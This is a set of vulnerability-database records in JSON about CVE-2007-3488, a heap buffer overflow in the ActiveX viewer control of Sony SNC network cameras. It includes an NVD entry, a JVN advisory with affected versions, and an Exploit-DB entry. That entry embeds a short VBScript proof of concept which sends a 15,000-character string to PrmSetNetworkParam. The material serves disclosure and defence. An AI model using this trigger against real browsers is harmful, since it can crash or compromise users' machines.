{"id": "CVE-2007-3488", "bulletinFamily": "NVD", "title": "CVE-2007-3488", "description": "Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method.", "published": "2007-06-29T18:30:00", "modified": "2017-09-29T01:29:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3488", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/24684", "http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-000012.html", "http://pro.sony.com/bbsc/ssr/cat-securitycameras/resource.downloads.bbsccms-assets-cat-camsec-downloads-AffectedNetworkCameras.shtml", "http://osvdb.org/39479", "http://jvn.jp/en/jp/JVN16767117/041520/index.html", "https://www.exploit-db.com/exploits/4120", "http://jvn.jp/en/jp/JVN16767117/index.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/35133"], "cvelist": ["CVE-2007-3488"], "type": "cve", "lastseen": "2019-05-29T18:09:00", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "8764fcd0f53df63cd333bf63caaa37a3"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "0c343906dbb15b9d5a015cf0da8329d8"}, {"key": "cpe23", "hash": "b465f8f319c313fe91c879e23a5ae3d3"}, {"key": "cvelist", "hash": "2b3f9b0686b1e7d0bdf24736f6ddc6c5"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "cvss2", "hash": "11e56c2d8f36b1920223217250e3f2a6"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "040aab116caafb920e9188cab90711eb"}, {"key": "href", "hash": "d0bda4d4e11fce8c747df0d897746afd"}, {"key": "modified", "hash": "28569f4ae2df6d0ea506c3994e1c84e2"}, {"key": "published", "hash": "8025597ea5f531c17e1c3a5f135e963f"}, {"key": "references", "hash": "9b6737fe40e6b8cdd39f7ee33fc555aa"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "0e2bd0a644849db967ffc62777470dae"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "153072c6f9d4446f1db563c4cc29b5d1e16cb9b414265bf08a8a5e477f45e644", "viewCount": 1, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2019-05-29T18:09:00"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:4120"]}, {"type": "jvn", "idList": ["JVN:16767117"]}, {"type": "osvdb", "idList": ["OSVDB:39479"]}], "modified": "2019-05-29T18:09:00"}, "vulnersScore": 8.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:sony:sony_network_camera_snc-p5:1.0", "cpe:/h:sony:sony_network_camera_snc-p5:1.0"], "affectedSoftware": [{"name": "sony sony_network_camera_snc-p5", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:h:sony:sony_network_camera_snc-p5:1.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-01-31T20:12:05", "bulletinFamily": "exploit", "description": "Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC. CVE-2007-3488. Dos exploit for windows platform", "modified": "2007-06-27T00:00:00", "published": "2007-06-27T00:00:00", "id": "EDB-ID:4120", "href": "https://www.exploit-db.com/exploits/4120/", "type": "exploitdb", "title": "Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC", "sourceData": "<!--\r\nSony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC\r\n\r\nCamera info\r\nhttp://bssc.sel.sony.com/BroadcastandBusiness/DisplayModel?id=79540\r\n\r\nSNC-P5 External API documentation\r\nhttp://www.tracor-europe.info/racine/sony/PROG/P5/API/Documents/SNC-P5APIDocument1.0EN.pdf\r\n\r\n/str0ke ! milw0rm.com \r\n-->\r\n\r\n<script language = 'vbscript'>\r\nSub tryMe()\r\n buff = String(15000, \"A\")\r\n viewer.PrmSetNetworkParam buff, 1\r\nEnd Sub\r\n</script>\r\n\r\n<OBJECT CLASSID=\"CLSID:5CB430A9-CAAC-4C91-AF61-6D410EEE1221\" id=\"viewer\"> </OBJECT>\r\n\r\n<input language=VBScript onclick=tryMe() type=button value=\"Click Me\">\r\n\r\n# milw0rm.com [2007-06-27]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4120/"}], "jvn": [{"lastseen": "2019-05-29T17:21:25", "bulletinFamily": "info", "description": "\n ## Description\n\nThe ActiveX Control for Sony SNC series network cameras is a software to monitor images over the network using a web browser. This ActiveX Control contains a heap-based buffer overflow vulnerability triggered by the improper processing of some configuration variables. \n\n ## Impact\n\nA remote attacker could execute arbitrary code. \n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the vendor. \n\n ## Products Affected\n\nTerminals where an ActiveX Control module is installed from the following systems: \n\n\n * SNC-RZ25N prior to 1.30\n * SNC-P1 prior to 1.29\n * SNC-P5 prior to 1.29\n * SNC-CS10 prior to 1.06\n * SNC-CS11 prior to 1.06\n * SNC-DF40N prior to 1.18\n * SNC-DF70N prior to 1.18\n * SNC-RZ50N prior to 2.22\n * SNC-CS50N prior to 2.22\n * SNC-DF85N prior to 1.12\n * SNC-DF80N prior to 1.12\n * SNC-DF50N prior to 1.12\n * SNC-RX570N/W 3.00 or prior to 2.31\n * SNC-RX570N/B 3.00 or prior to 2.31\n * SNC-RX550N/W 3.00 or prior to 2.31\n * SNC-RX550N/B 3.00 or prior to 2.31\n * SNC-RX530N/W 3.00 or prior to 2.31\n * SNC-RX530N/B 3.00 or prior to 2.31\n * SNC-RZ25P prior to 1.30\n * SNC-DF70P prior to 1.18\n * SNC-DF40P prior to 1.18\n * SNC-RZ50P prior to 2.22\n * SNC-CS50P prior to 2.22\n * SNC-DF85P prior to 1.12\n * SNC-DF80P prior to 1.12\n * SNC-DF50P prior to 1.12\n * SNC-RX570P 3.00 or prior to 2.31\n * SNC-RX550P 3.00 or prior to 2.31\n * SNC-RX530P 3.00 or prior to 2.31\n", "modified": "2009-03-09T00:00:00", "published": "2009-02-23T00:00:00", "id": "JVN:16767117", "href": "http://jvn.jp/en/jp/JVN16767117/index.html", "title": "JVN#16767117 Buffer overflow vulnerability in ActiveX Control for Sony SNC series network cameras", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 35133\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4120\n[CVE-2007-3488](https://vulners.com/cve/CVE-2007-3488)\nBugtraq ID: 24684\n", "modified": "2007-06-27T17:11:21", "published": "2007-06-27T17:11:21", "href": "https://vulners.com/osvdb/OSVDB:39479", "id": "OSVDB:39479", "title": "Sony Network Camera SNC-P5 viewer ActiveX PrmSetNetworkParam Method Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}